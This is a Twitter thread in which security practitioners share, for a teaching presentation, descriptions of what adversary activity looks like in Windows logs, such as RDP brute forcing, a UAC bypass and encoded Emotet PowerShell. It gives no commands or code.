Twitter | Pretraživanje | |
New year, new Fiendish Dr. Noid, API-T
Blue Team peeps. I've got a favor to ask. Do you have any screenshots of adversary activity you could share with me? Redacted where necessary, of course. I'm trying to help a friend out with a presentation they're giving. The person who was supposed to help her is in the hospital
Reply Retweet Označi sa "sviđa mi se" More
New year, new Fiendish Dr. Noid, API-T 2. velj
Odgovor korisniku/ci @_noid_
She's going to be talking about what adversary activity looks like. I've got plenty of screenshots from the attackers perspective, but not much from the defenders side of things
Reply Retweet Označi sa "sviđa mi se"
New year, new Fiendish Dr. Noid, API-T 2. velj
Odgovor korisniku/ci @_noid_
Windows perspective is ideal as most of her students are operating in that environment
Reply Retweet Označi sa "sviđa mi se"
Matthew Toussain 2. velj
Odgovor korisniku/ci @_noid_
Note the timestamps associated with the attempted login events. Here we see a successful online password brute forcing attack against RDP. Closer inspection of the log data would reveal the successfully authenticated account and remote IP address.
Reply Retweet Označi sa "sviđa mi se"
New year, new Fiendish Dr. Noid, API-T 2. velj
Odgovor korisniku/ci @0sm0s1z
Funny enough, I'm working on a list of logon event types to watch for. One of my usual indicators is attempts at Type 2 logon from service accounts or interactive logon from workstation to workstation. Outside of Help Desk/IT, I consider it anomalous behavior most places
Reply Retweet Označi sa "sviđa mi se"
Jarno Niemela 3. velj
Odgovor korisniku/ci @_noid_
Here is what a Windows 10 Fodhelper UAC bypass looks like. The payload tries to launch multiple Meterpreter stagers and then when it succeeds, does UAC bypass. The data is from my test environment, since obviously can't share customer data
Reply Retweet Označi sa "sviđa mi se"
New year, new Fiendish Dr. Noid, API-T 3. velj
Odgovor korisniku/ci @jarnomn
This would pair well with the screenshots I generated of PowerShell obfuscated payloads. Thanks
Reply Retweet Označi sa "sviđa mi se"
Digital 2. velj
Odgovor korisniku/ci @_noid_
Does emotet being executed on a users machine count? This has actually become an interview question (showing the PowerShell encoded command) to see how an analyst would figure out what's happening (basically asking that they understand they need to decode a base64 hash).
Reply Retweet Označi sa "sviđa mi se"
New year, new Fiendish Dr. Noid, API-T 2. velj
Odgovor korisniku/ci @0xDigital
That's a good one. Funny enough I was just digging through some of my encoded payloads looking for a good "If you see this, shit's happening" example
Reply Retweet Označi sa "sviđa mi se"
Adam ♿ 🐧 3. velj
Odgovor korisniku/ci @_noid_
Does a home user count?
Reply Retweet Označi sa "sviđa mi se"
Ryan 3. velj
Odgovor korisniku/ci @_noid_ @hacks4pancakes
Random writeup from old CTF Not my writeup, so can't grant permission if that's a factor
Reply Retweet Označi sa "sviđa mi se"